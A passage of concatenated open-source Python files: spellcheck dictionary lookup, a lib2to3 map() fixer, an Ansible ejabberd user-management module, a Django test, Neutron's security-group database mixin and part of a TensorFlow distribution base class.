self.word_cache.pop(key, None)
for langcode, words in removals.iteritems():
self.remove_user_words(words, langcode)
self.save_user_dictionaries()
return changed
def word_in_user_dictionary(self, word, locale):
key = (word, locale.langcode)
for ud in self.active_user_dictionaries:
if key in ud.words:
return ud.name
def create_user_dictionary(self, name):
if name in {d.name for d in self.all_user_dictionaries}:
raise ValueError('A dictionary named %s already exists' % name)
d = UserDictionary(name=name, is_active=True, words=())
self.active_user_dictionaries.append(d)
self.save_user_dictionaries()
def remove_user_dictionary(self, name):
changed = False
for x in (self.active_user_dictionaries, self.inactive_user_dictionaries):
for d in tuple(x):
if d.name == name:
x.remove(d)
changed = True
if changed:
self.save_user_dictionaries()
self.clear_caches()
return changed
def rename_user_dictionary(self, name, new_name):
changed = False
for d in self.all_user_dictionaries:
if d.name == name:
d.name = new_name
changed = True
if changed:
self.save_user_dictionaries()
return changed
def recognized(self, word, locale=None):
locale = locale or self.default_locale
key = (word, locale)
ans = self.word_cache.get(key, None)
if ans is None:
lkey = (word, locale.langcode)
ans = False
if lkey in self.ignored_words:
ans = True
else:
for ud in self.active_user_dictionaries:
if lkey in ud.words:
ans = True
break
else:
d = self.dictionary_for_locale(locale)
if d is not None:
try:
ans = d.obj.recognized(word)
except ValueError:
pass
else:
ans = True
if ans is False and self.negative_pat.match(word) is not None:
ans = True
self.word_cache[key] = ans
return ans
def suggestions(self, word, locale=None):
locale = locale or self.default_locale
d = self.dictionary_for_locale(locale)
ans = ()
def add_suggestion(w, ans):
return (w,) + tuple(x for x in ans if x != w)
if d is not None:
try:
ans = d.obj.suggest(unicode(word))
except ValueError:
pass
else:
dehyphenated_word = self.remove_hyphenation.sub('', word)
if len(dehyphenated_word) != len(word) and self.recognized(dehyphenated_word, locale):
# Ensure the de-hyphenated word is present and is the first suggestion
ans = add_suggestion(dehyphenated_word, ans)
else:
m = self.fix_punctuation_pat.search(word)
if m is not None:
w1, w2 = word[:m.start()], word[m.end():]
if self.recognized(w1) and self.recognized(w2):
fw = w1 + m.group() + ' ' + w2
ans = add_suggestion(fw, ans)
if capitalize(w2) != w2:
fw = w1 + m.group() + ' ' + capitalize(w2)
ans = add_suggestion(fw, ans)
return ans
def test_dictionaries():
dictionaries = Dictionaries()
dictionaries.initialize()
eng = parse_lang_code('en')
rec = partial(dictionaries.recognized, locale=eng)
sg = partial(dictionaries.suggestions, locale=eng)
if not rec('recognized'):
raise ValueError('recognized not recognized')
if 'adequately' not in sg('ade-quately'):
raise ValueError('adequately not in %s' % sg('ade-quately'))
if 'magic. Wand' not in sg('magic.wand'):
raise ValueError('magic. Wand not in: %s' % sg('magic.wand'))
d = load_dictionary(get_dictionary(parse_lang_code('es'))).obj
assert d.recognized('Achí')
if __name__ == '__main__':
test_dictionaries()
|
BaladiDogGames/baladidoggames.github.io
|
refs/heads/master
|
mingw/bin/lib/lib2to3/fixes/fix_map.py
|
327
|
# Copyright 2007 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Fixer that changes map(F, ...) into list(map(F, ...)) unless there
exists a 'from future_builtins import map' statement in the top-level
namespace.
As a special case, map(None, X) is changed into list(X). (This is
necessary because the semantics are changed in this case -- the new
map(None, X) is equivalent to [(x,) for x in X].)
We avoid the transformation (except for the special case mentioned
above) if the map() call is directly contained in iter(<>), list(<>),
tuple(<>), sorted(<>), ...join(<>), or for V in <>:.
NOTE: This is still not correct if the original code was depending on
map(F, X, Y, ...) to go on until the longest argument is exhausted,
substituting None for missing values -- like zip(), it now stops as
soon as the shortest argument is exhausted.
"""
# Local imports
from ..pgen2 import token
from .. import fixer_base
from ..fixer_util import Name, Call, ListComp, in_special_context
from ..pygram import python_symbols as syms
class FixMap(fixer_base.ConditionalFix):
BM_compatible = True
PATTERN = """
map_none=power<
'map'
trailer< '(' arglist< 'None' ',' arg=any [','] > ')' >
>
|
map_lambda=power<
'map'
trailer<
'('
arglist<
lambdef< 'lambda'
(fp=NAME | vfpdef< '(' fp=NAME ')'> ) ':' xp=any
>
','
it=any
>
')'
>
>
|
power<
'map' trailer< '(' [arglist=any] ')' >
>
"""
skip_on = 'future_builtins.map'
def transform(self, node, results):
if self.should_skip(node):
return
if node.parent.type == syms.simple_stmt:
self.warning(node, "You should use a for loop here")
new = node.clone()
new.prefix = u""
new = Call(Name(u"list"), [new])
elif "map_lambda" in results:
new = ListComp(results["xp"].clone(),
results["fp"].clone(),
results["it"].clone())
else:
if "map_none" in results:
new = results["arg"].clone()
else:
if "arglist" in results:
args = results["arglist"]
if args.type == syms.arglist and \
args.children[0].type == token.NAME and \
args.children[0].value == "None":
self.warning(node, "cannot convert map(None, ...) "
"with multiple arguments because map() "
"now truncates to the shortest sequence")
return
if in_special_context(node):
return None
new = node.clone()
new.prefix = u""
new = Call(Name(u"list"), [new])
new.prefix = node.prefix
return new
|
txemi/ansible
|
refs/heads/devel
|
lib/ansible/modules/web_infrastructure/ejabberd_user.py
|
48
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013, Peter Sprygada <sprygada@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ejabberd_user
version_added: "1.5"
author: "Peter Sprygada (@privateip)"
short_description: Manages users for ejabberd servers
requirements:
- ejabberd with mod_admin_extra
description:
- This module provides user management for ejabberd servers
options:
username:
description:
- the name of the user to manage
required: true
host:
description:
- the ejabberd host associated with this username
required: true
password:
description:
- the password to assign to the username
required: false
logging:
description:
- enables or disables the local syslog facility for this module
required: false
default: false
choices: [ 'true', 'false', 'yes', 'no' ]
state:
description:
- describe the desired state of the user to be managed
required: false
default: 'present'
choices: [ 'present', 'absent' ]
notes:
- Password parameter is required for state == present only
- Passwords must be stored in clear text for this release
- The ejabberd configuration file must include mod_admin_extra as a module.
'''
EXAMPLES = '''
# Example playbook entries using the ejabberd_user module to manage users state.
- name: create a user if it does not exists
ejabberd_user:
username: test
host: server
password: password
- name: delete a user if it exists
ejabberd_user:
username: test
host: server
state: absent
'''
import syslog
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils.basic import *
class EjabberdUserException(Exception):
""" Base exception for EjabberdUser class object """
pass
class EjabberdUser(object):
""" This object represents a user resource for an ejabberd server. The
object manages user creation and deletion using ejabberdctl. The following
commands are currently supported:
* ejabberdctl register
* ejabberdctl deregister
"""
def __init__(self, module):
self.module = module
self.logging = module.params.get('logging')
self.state = module.params.get('state')
self.host = module.params.get('host')
self.user = module.params.get('username')
self.pwd = module.params.get('password')
@property
def changed(self):
""" This method will check the current user and see if the password has
changed. It will return True if the user does not match the supplied
credentials and False if it does not
"""
try:
options = [self.user, self.host, self.pwd]
(rc, out, err) = self.run_command('check_password', options)
except EjabberdUserException:
e = get_exception()
(rc, out, err) = (1, None, "required attribute(s) missing")
return rc
@property
def exists(self):
""" This method will check to see if the supplied username exists for
host specified. If the user exists True is returned, otherwise False
is returned
"""
try:
options = [self.user, self.host]
(rc, out, err) = self.run_command('check_account', options)
except EjabberdUserException:
e = get_exception()
(rc, out, err) = (1, None, "required attribute(s) missing")
return not bool(int(rc))
def log(self, entry):
""" This method will log information to the local syslog facility """
if self.logging:
syslog.openlog('ansible-%s' % self.module._name)
syslog.syslog(syslog.LOG_NOTICE, entry)
def run_command(self, cmd, options):
""" This method will run the any command specified and return the
returns using the Ansible common module
"""
if not all(options):
raise EjabberdUserException
cmd = 'ejabberdctl %s ' % cmd
cmd += " ".join(options)
self.log('command: %s' % cmd)
return self.module.run_command(cmd.split())
def update(self):
""" The update method will update the credentials for the user provided
"""
try:
options = [self.user, self.host, self.pwd]
(rc, out, err) = self.run_command('change_password', options)
except EjabberdUserException:
e = get_exception()
(rc, out, err) = (1, None, "required attribute(s) missing")
return (rc, out, err)
def create(self):
""" The create method will create a new user on the host with the
password provided
"""
try:
options = [self.user, self.host, self.pwd]
(rc, out, err) = self.run_command('register', options)
except EjabberdUserException:
e = get_exception()
(rc, out, err) = (1, None, "required attribute(s) missing")
return (rc, out, err)
def delete(self):
""" The delete method will delete the user from the host
"""
try:
options = [self.user, self.host]
(rc, out, err) = self.run_command('unregister', options)
except EjabberdUserException:
e = get_exception()
(rc, out, err) = (1, None, "required attribute(s) missing")
return (rc, out, err)
def main():
module = AnsibleModule(
argument_spec = dict(
host=dict(default=None, type='str'),
username=dict(default=None, type='str'),
password=dict(default=None, type='str', no_log=True),
state=dict(default='present', choices=['present', 'absent']),
logging=dict(default=False, type='bool')
),
supports_check_mode = True
)
obj = EjabberdUser(module)
rc = None
result = dict()
if obj.state == 'absent':
if obj.exists:
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = obj.delete()
if rc != 0:
module.fail_json(msg=err, rc=rc)
elif obj.state == 'present':
if not obj.exists:
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = obj.create()
elif obj.changed:
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = obj.update()
if rc is not None and rc != 0:
module.fail_json(msg=err, rc=rc)
if rc is None:
result['changed'] = False
else:
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gispro/OceanViewer2
|
refs/heads/master
|
app/static/externals/proj4js/tools/mkpjcat.py
|
250
|
#!/usr/bin/env python
import sys
sys.path.append(".")
import pjjs
resourcesDirectory = "catalogues"
targetDirectory = "../lib/defs"
if len(sys.argv) > 1:
resourcesDirectory = sys.argv[1]
if len(sys.argv) > 2:
targetDirectory = sys.argv[2]
print "Generating Proj4js catalogues."
pjjs.pjcat2js_clean(resourcesDirectory,targetDirectory)
pjjs.pjcat2js_run(resourcesDirectory,targetDirectory)
print "Done."
|
samrose3/eventhunt
|
refs/heads/master
|
tests/python/base/test_views.py
|
1
|
from django.core.urlresolvers import reverse
from django.test import override_settings
from rest_framework import status
from rest_framework.test import APITestCase
from tests.python.accounts.test_models import UserFactory
@override_settings(CELERY_EAGER_PROPAGATES_EXCEPTIONS=True, CELERY_ALWAYS_EAGER=True, BROKER_BACKEND='memory')
class BaseTests(APITestCase):
def setUp(self):
pass
def test_get_main_page(self):
response = self.client.get(reverse('index'))
self.assertEqual(response.status_code, status.HTTP_200_OK)
|
leeseuljeong/leeseulstack_neutron
|
refs/heads/master
|
neutron/db/securitygroups_db.py
|
8
|
# Copyright 2012 VMware, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
import sqlalchemy as sa
from sqlalchemy import orm
from sqlalchemy.orm import exc
from sqlalchemy.orm import scoped_session
from neutron.api.v2 import attributes
from neutron.common import constants
from neutron.db import db_base_plugin_v2
from neutron.db import model_base
from neutron.db import models_v2
from neutron.extensions import securitygroup as ext_sg
from neutron.openstack.common import uuidutils
IP_PROTOCOL_MAP = {constants.PROTO_NAME_TCP: constants.PROTO_NUM_TCP,
constants.PROTO_NAME_UDP: constants.PROTO_NUM_UDP,
constants.PROTO_NAME_ICMP: constants.PROTO_NUM_ICMP,
constants.PROTO_NAME_ICMP_V6: constants.PROTO_NUM_ICMP_V6}
class SecurityGroup(model_base.BASEV2, models_v2.HasId, models_v2.HasTenant):
"""Represents a v2 neutron security group."""
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
class SecurityGroupPortBinding(model_base.BASEV2):
"""Represents binding between neutron ports and security profiles."""
port_id = sa.Column(sa.String(36),
sa.ForeignKey("ports.id",
ondelete='CASCADE'),
primary_key=True)
security_group_id = sa.Column(sa.String(36),
sa.ForeignKey("securitygroups.id"),
primary_key=True)
# Add a relationship to the Port model in order to instruct SQLAlchemy to
# eagerly load security group bindings
ports = orm.relationship(
models_v2.Port,
backref=orm.backref("security_groups",
lazy='joined', cascade='delete'))
class SecurityGroupRule(model_base.BASEV2, models_v2.HasId,
models_v2.HasTenant):
"""Represents a v2 neutron security group rule."""
security_group_id = sa.Column(sa.String(36),
sa.ForeignKey("securitygroups.id",
ondelete="CASCADE"),
nullable=False)
remote_group_id = sa.Column(sa.String(36),
sa.ForeignKey("securitygroups.id",
ondelete="CASCADE"),
nullable=True)
direction = sa.Column(sa.Enum('ingress', 'egress',
name='securitygrouprules_direction'))
ethertype = sa.Column(sa.String(40))
protocol = sa.Column(sa.String(40))
port_range_min = sa.Column(sa.Integer)
port_range_max = sa.Column(sa.Integer)
remote_ip_prefix = sa.Column(sa.String(255))
security_group = orm.relationship(
SecurityGroup,
backref=orm.backref('rules', cascade='all,delete'),
primaryjoin="SecurityGroup.id==SecurityGroupRule.security_group_id")
source_group = orm.relationship(
SecurityGroup,
backref=orm.backref('source_rules', cascade='all,delete'),
primaryjoin="SecurityGroup.id==SecurityGroupRule.remote_group_id")
class SecurityGroupDbMixin(ext_sg.SecurityGroupPluginBase):
"""Mixin class to add security group to db_base_plugin_v2."""
__native_bulk_support = True
def create_security_group_bulk(self, context, security_group_rule):
return self._create_bulk('security_group', context,
security_group_rule)
def create_security_group(self, context, security_group, default_sg=False):
"""Create security group.
If default_sg is true that means we are a default security group for
a given tenant if it does not exist.
"""
s = security_group['security_group']
tenant_id = self._get_tenant_id_for_create(context, s)
if not default_sg:
self._ensure_default_security_group(context, tenant_id)
with context.session.begin(subtransactions=True):
security_group_db = SecurityGroup(id=s.get('id') or (
uuidutils.generate_uuid()),
description=s['description'],
tenant_id=tenant_id,
name=s['name'])
context.session.add(security_group_db)
for ethertype in ext_sg.sg_supported_ethertypes:
if s.get('name') == 'default':
# Allow intercommunication
ingress_rule = SecurityGroupRule(
id=uuidutils.generate_uuid(), tenant_id=tenant_id,
security_group=security_group_db,
direction='ingress',
ethertype=ethertype,
source_group=security_group_db)
context.session.add(ingress_rule)
egress_rule = SecurityGroupRule(
id=uuidutils.generate_uuid(), tenant_id=tenant_id,
security_group=security_group_db,
direction='egress',
ethertype=ethertype)
context.session.add(egress_rule)
return self._make_security_group_dict(security_group_db)
def get_security_groups(self, context, filters=None, fields=None,
sorts=None, limit=None,
marker=None, page_reverse=False, default_sg=False):
# If default_sg is True do not call _ensure_default_security_group()
# so this can be done recursively. Context.tenant_id is checked
# because all the unit tests do not explicitly set the context on
# GETS. TODO(arosen) context handling can probably be improved here.
if not default_sg and context.tenant_id:
tenant_id = filters.get('tenant_id')
if tenant_id:
tenant_id = tenant_id[0]
else:
tenant_id = context.tenant_id
self._ensure_default_security_group(context, tenant_id)
marker_obj = self._get_marker_obj(context, 'security_group', limit,
marker)
return self._get_collection(context,
SecurityGroup,
self._make_security_group_dict,
filters=filters, fields=fields,
sorts=sorts,
limit=limit, marker_obj=marker_obj,
page_reverse=page_reverse)
def get_security_groups_count(self, context, filters=None):
return self._get_collection_count(context, SecurityGroup,
filters=filters)
def get_security_group(self, context, id, fields=None, tenant_id=None):
"""Tenant id is given to handle the case when creating a security
group rule on behalf of another use.
"""
if tenant_id:
tmp_context_tenant_id = context.tenant_id
context.tenant_id = tenant_id
try:
with context.session.begin(subtransactions=True):
ret = self._make_security_group_dict(self._get_security_group(
context, id), fields)
ret['security_group_rules'] = self.get_security_group_rules(
context, {'security_group_id': [id]})
finally:
if tenant_id:
context.tenant_id = tmp_context_tenant_id
return ret
def _get_security_group(self, context, id):
try:
query = self._model_query(context, SecurityGroup)
sg = query.filter(SecurityGroup.id == id).one()
except exc.NoResultFound:
raise ext_sg.SecurityGroupNotFound(id=id)
return sg
def delete_security_group(self, context, id):
filters = {'security_group_id': [id]}
ports = self._get_port_security_group_bindings(context, filters)
if ports:
raise ext_sg.SecurityGroupInUse(id=id)
# confirm security group exists
sg = self._get_security_group(context, id)
if sg['name'] == 'default' and not context.is_admin:
raise ext_sg.SecurityGroupCannotRemoveDefault()
with context.session.begin(subtransactions=True):
context.session.delete(sg)
def update_security_group(self, context, id, security_group):
s = security_group['security_group']
with context.session.begin(subtransactions=True):
sg = self._get_security_group(context, id)
if sg['name'] == 'default' and 'name' in s:
raise ext_sg.SecurityGroupCannotUpdateDefault()
sg.update(s)
return self._make_security_group_dict(sg)
def _make_security_group_dict(self, security_group, fields=None):
res = {'id': security_group['id'],
'name': security_group['name'],
'tenant_id': security_group['tenant_id'],
'description': security_group['description']}
res['security_group_rules'] = [self._make_security_group_rule_dict(r)
for r in security_group.rules]
return self._fields(res, fields)
def _make_security_group_binding_dict(self, security_group, fields=None):
res = {'port_id': security_group['port_id'],
'security_group_id': security_group['security_group_id']}
return self._fields(res, fields)
def _create_port_security_group_binding(self, context, port_id,
security_group_id):
with context.session.begin(subtransactions=True):
db = SecurityGroupPortBinding(port_id=port_id,
security_group_id=security_group_id)
context.session.add(db)
def _get_port_security_group_bindings(self, context,
filters=None, fields=None):
return self._get_collection(context,
SecurityGroupPortBinding,
self._make_security_group_binding_dict,
filters=filters, fields=fields)
def _delete_port_security_group_bindings(self, context, port_id):
query = self._model_query(context, SecurityGroupPortBinding)
bindings = query.filter(
SecurityGroupPortBinding.port_id == port_id)
with context.session.begin(subtransactions=True):
for binding in bindings:
context.session.delete(binding)
def create_security_group_rule_bulk(self, context, security_group_rule):
return self._create_bulk('security_group_rule', context,
security_group_rule)
def create_security_group_rule_bulk_native(self, context,
security_group_rule):
r = security_group_rule['security_group_rules']
scoped_session(context.session)
security_group_id = self._validate_security_group_rules(
context, security_group_rule)
with context.session.begin(subtransactions=True):
if not self.get_security_group(context, security_group_id):
raise ext_sg.SecurityGroupNotFound(id=security_group_id)
self._check_for_duplicate_rules(context, r)
ret = []
for rule_dict in r:
rule = rule_dict['security_group_rule']
tenant_id = self._get_tenant_id_for_create(context, rule)
db = SecurityGroupRule(
id=uuidutils.generate_uuid(), tenant_id=tenant_id,
security_group_id=rule['security_group_id'],
direction=rule['direction'],
remote_group_id=rule.get('remote_group_id'),
ethertype=rule['ethertype'],
protocol=rule['protocol'],
port_range_min=rule['port_range_min'],
port_range_max=rule['port_range_max'],
remote_ip_prefix=rule.get('remote_ip_prefix'))
context.session.add(db)
ret.append(self._make_security_group_rule_dict(db))
return ret
def create_security_group_rule(self, context, security_group_rule):
bulk_rule = {'security_group_rules': [security_group_rule]}
return self.create_security_group_rule_bulk_native(context,
bulk_rule)[0]
def _get_ip_proto_number(self, protocol):
if protocol is None:
return
# According to bug 1381379, protocol is always set to string to avoid
# problems with comparing int and string in PostgreSQL. Here this
# string is converted to int to give an opportunity to use it as
# before.
return int(IP_PROTOCOL_MAP.get(protocol, protocol))
def _validate_port_range(self, rule):
"""Check that port_range is valid."""
if (rule['port_range_min'] is None and
rule['port_range_max'] is None):
return
if not rule['protocol']:
raise ext_sg.SecurityGroupProtocolRequiredWithPorts()
ip_proto = self._get_ip_proto_number(rule['protocol'])
if ip_proto in [constants.PROTO_NUM_TCP, constants.PROTO_NUM_UDP]:
if (rule['port_range_min'] is not None and
rule['port_range_min'] <= rule['port_range_max']):
pass
else:
raise ext_sg.SecurityGroupInvalidPortRange()
elif ip_proto == constants.PROTO_NUM_ICMP:
for attr, field in [('port_range_min', 'type'),
('port_range_max', 'code')]:
if rule[attr] > 255:
raise ext_sg.SecurityGroupInvalidIcmpValue(
field=field, attr=attr, value=rule[attr])
if (rule['port_range_min'] is None and
rule['port_range_max']):
raise ext_sg.SecurityGroupMissingIcmpType(
value=rule['port_range_max'])
def _validate_security_group_rules(self, context, security_group_rule):
"""Check that rules being installed.
Check that all rules belong to the same security
group, remote_group_id/security_group_id belong to the same tenant,
and rules are valid.
"""
new_rules = set()
tenant_ids = set()
for rules in security_group_rule['security_group_rules']:
rule = rules.get('security_group_rule')
new_rules.add(rule['security_group_id'])
self._validate_port_range(rule)
self._validate_ip_prefix(rule)
if rule['remote_ip_prefix'] and rule['remote_group_id']:
raise ext_sg.SecurityGroupRemoteGroupAndRemoteIpPrefix()
if rule['tenant_id'] not in tenant_ids:
tenant_ids.add(rule['tenant_id'])
remote_group_id = rule.get('remote_group_id')
# Check that remote_group_id exists for tenant
if remote_group_id:
self.get_security_group(context, remote_group_id,
tenant_id=rule['tenant_id'])
if len(new_rules) > 1:
raise ext_sg.SecurityGroupNotSingleGroupRules()
security_group_id = new_rules.pop()
# Confirm single tenant and that the tenant has permission
# to add rules to this security group.
if len(tenant_ids) > 1:
raise ext_sg.SecurityGroupRulesNotSingleTenant()
for tenant_id in tenant_ids:
self.get_security_group(context, security_group_id,
tenant_id=tenant_id)
return security_group_id
def _make_security_group_rule_dict(self, security_group_rule, fields=None):
res = {'id': security_group_rule['id'],
'tenant_id': security_group_rule['tenant_id'],
'security_group_id': security_group_rule['security_group_id'],
'ethertype': security_group_rule['ethertype'],
'direction': security_group_rule['direction'],
'protocol': security_group_rule['protocol'],
'port_range_min': security_group_rule['port_range_min'],
'port_range_max': security_group_rule['port_range_max'],
'remote_ip_prefix': security_group_rule['remote_ip_prefix'],
'remote_group_id': security_group_rule['remote_group_id']}
return self._fields(res, fields)
def _make_security_group_rule_filter_dict(self, security_group_rule):
sgr = security_group_rule['security_group_rule']
res = {'tenant_id': [sgr['tenant_id']],
'security_group_id': [sgr['security_group_id']],
'direction': [sgr['direction']]}
include_if_present = ['protocol', 'port_range_max', 'port_range_min',
'ethertype', 'remote_ip_prefix',
'remote_group_id']
for key in include_if_present:
value = sgr.get(key)
if value:
res[key] = [value]
return res
def _check_for_duplicate_rules(self, context, security_group_rules):
for i in security_group_rules:
found_self = False
for j in security_group_rules:
if i['security_group_rule'] == j['security_group_rule']:
if found_self:
raise ext_sg.DuplicateSecurityGroupRuleInPost(rule=i)
found_self = True
# Check in database if rule exists
filters = self._make_security_group_rule_filter_dict(i)
db_rules = self.get_security_group_rules(context, filters)
# Note(arosen): the call to get_security_group_rules wildcards
# values in the filter that have a value of [None]. For
# example, filters = {'remote_group_id': [None]} will return
# all security group rules regardless of their value of
# remote_group_id. Therefore it is not possible to do this
# query unless the behavior of _get_collection()
# is changed which cannot be because other methods are already
# relying on this behavior. Therefore, we do the filtering
# below to check for these corner cases.
for db_rule in db_rules:
# need to remove id from db_rule for matching
id = db_rule.pop('id')
if (i['security_group_rule'] == db_rule):
raise ext_sg.SecurityGroupRuleExists(id=id)
def _validate_ip_prefix(self, rule):
"""Check that a valid cidr was specified as remote_ip_prefix
No need to check that it is in fact an IP address as this is already
validated by attribute validators.
Check that rule ethertype is consistent with remote_ip_prefix ip type.
Add mask to ip_prefix if absent (192.168.1.10 -> 192.168.1.10/32).
"""
input_prefix = rule['remote_ip_prefix']
if input_prefix:
addr = netaddr.IPNetwork(input_prefix)
# set input_prefix to always include the netmask:
rule['remote_ip_prefix'] = str(addr)
# check consistency of ethertype with addr version
if rule['ethertype'] != "IPv%d" % (addr.version):
raise ext_sg.SecurityGroupRuleParameterConflict(
ethertype=rule['ethertype'], cidr=input_prefix)
def get_security_group_rules(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
marker_obj = self._get_marker_obj(context, 'security_group_rule',
limit, marker)
return self._get_collection(context,
SecurityGroupRule,
self._make_security_group_rule_dict,
filters=filters, fields=fields,
sorts=sorts,
limit=limit, marker_obj=marker_obj,
page_reverse=page_reverse)
def get_security_group_rules_count(self, context, filters=None):
return self._get_collection_count(context, SecurityGroupRule,
filters=filters)
def get_security_group_rule(self, context, id, fields=None):
security_group_rule = self._get_security_group_rule(context, id)
return self._make_security_group_rule_dict(security_group_rule, fields)
def _get_security_group_rule(self, context, id):
try:
query = self._model_query(context, SecurityGroupRule)
sgr = query.filter(SecurityGroupRule.id == id).one()
except exc.NoResultFound:
raise ext_sg.SecurityGroupRuleNotFound(id=id)
return sgr
def delete_security_group_rule(self, context, id):
with context.session.begin(subtransactions=True):
rule = self._get_security_group_rule(context, id)
context.session.delete(rule)
def _extend_port_dict_security_group(self, port_res, port_db):
# Security group bindings will be retrieved from the sqlalchemy
# model. As they're loaded eagerly with ports because of the
# joined load they will not cause an extra query.
security_group_ids = [sec_group_mapping['security_group_id'] for
sec_group_mapping in port_db.security_groups]
port_res[ext_sg.SECURITYGROUPS] = security_group_ids
return port_res
# Register dict extend functions for ports
db_base_plugin_v2.NeutronDbPluginV2.register_dict_extend_funcs(
attributes.PORTS, ['_extend_port_dict_security_group'])
def _process_port_create_security_group(self, context, port,
security_group_ids):
if attributes.is_attr_set(security_group_ids):
for security_group_id in security_group_ids:
self._create_port_security_group_binding(context, port['id'],
security_group_id)
# Convert to list as a set might be passed here and
# this has to be serialized
port[ext_sg.SECURITYGROUPS] = (security_group_ids and
list(security_group_ids) or [])
def _ensure_default_security_group(self, context, tenant_id):
"""Create a default security group if one doesn't exist.
:returns: the default security group id.
"""
filters = {'name': ['default'], 'tenant_id': [tenant_id]}
default_group = self.get_security_groups(context, filters,
default_sg=True)
if not default_group:
security_group = {
'security_group': {'name': 'default',
'tenant_id': tenant_id,
'description': _('Default security group')}
}
ret = self.create_security_group(context, security_group, True)
return ret['id']
else:
return default_group[0]['id']
def _get_security_groups_on_port(self, context, port):
"""Check that all security groups on port belong to tenant.
:returns: all security groups IDs on port belonging to tenant.
"""
p = port['port']
if not attributes.is_attr_set(p.get(ext_sg.SECURITYGROUPS)):
return
if p.get('device_owner') and p['device_owner'].startswith('network:'):
return
port_sg = p.get(ext_sg.SECURITYGROUPS, [])
filters = {'id': port_sg}
tenant_id = p.get('tenant_id')
if tenant_id:
filters['tenant_id'] = [tenant_id]
valid_groups = set(g['id'] for g in
self.get_security_groups(context, fields=['id'],
filters=filters))
requested_groups = set(port_sg)
port_sg_missing = requested_groups - valid_groups
if port_sg_missing:
raise ext_sg.SecurityGroupNotFound(id=str(port_sg_missing[0]))
return requested_groups
def _ensure_default_security_group_on_port(self, context, port):
# we don't apply security groups for dhcp, router
if (port['port'].get('device_owner') and
port['port']['device_owner'].startswith('network:')):
return
tenant_id = self._get_tenant_id_for_create(context,
port['port'])
default_sg = self._ensure_default_security_group(context, tenant_id)
if attributes.is_attr_set(port['port'].get(ext_sg.SECURITYGROUPS)):
sgids = port['port'].get(ext_sg.SECURITYGROUPS)
else:
sgids = [default_sg]
port['port'][ext_sg.SECURITYGROUPS] = sgids
def _check_update_deletes_security_groups(self, port):
"""Return True if port has as a security group and it's value
is either [] or not is_attr_set, otherwise return False
"""
if (ext_sg.SECURITYGROUPS in port['port'] and
not (attributes.is_attr_set(port['port'][ext_sg.SECURITYGROUPS])
and port['port'][ext_sg.SECURITYGROUPS] != [])):
return True
return False
def _check_update_has_security_groups(self, port):
"""Return True if port has as a security group and False if the
security_group field is is_attr_set or [].
"""
if (ext_sg.SECURITYGROUPS in port['port'] and
(attributes.is_attr_set(port['port'][ext_sg.SECURITYGROUPS]) and
port['port'][ext_sg.SECURITYGROUPS] != [])):
return True
return False
|
apark263/tensorflow
|
refs/heads/master
|
tensorflow/contrib/distributions/python/ops/conditional_distribution.py
|
120
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Conditional distribution base class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import util as distribution_util
class ConditionalDistribution(distribution.Distribution):
"""Distribution that supports intrinsic parameters (local latents).
Subclasses of this distribution may have additional keyword arguments passed
to their sample-based methods (i.e. `sample`, `log_prob`, etc.).
"""
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def sample(self, sample_shape=(), seed=None, name="sample",
**condition_kwargs):
return self._call_sample_n(sample_shape, seed, name, **condition_kwargs)
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def log_prob(self, value, name="log_prob", **condition_kwargs):
return self._call_log_prob(value, name, **condition_kwargs)
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def prob(self, value, name="prob", **condition_kwargs):
return self._call_prob(value, name, **condition_kwargs)
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def log_cdf(self, value, name="log_cdf", **condition_kwargs):
return self._call_log_cdf(value, name, **condition_kwargs)
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def cdf(self, value, name="cdf", **condition_kwargs):
return self._call_cdf(value, name, **condition_kwargs)
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def log_survival_function(self, value, name="log_survival_function",
**condition_kwargs):
return self._call_log_survival_function(value, name, **condition_kwargs)
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def survival_function(self, value, name="survival_function",
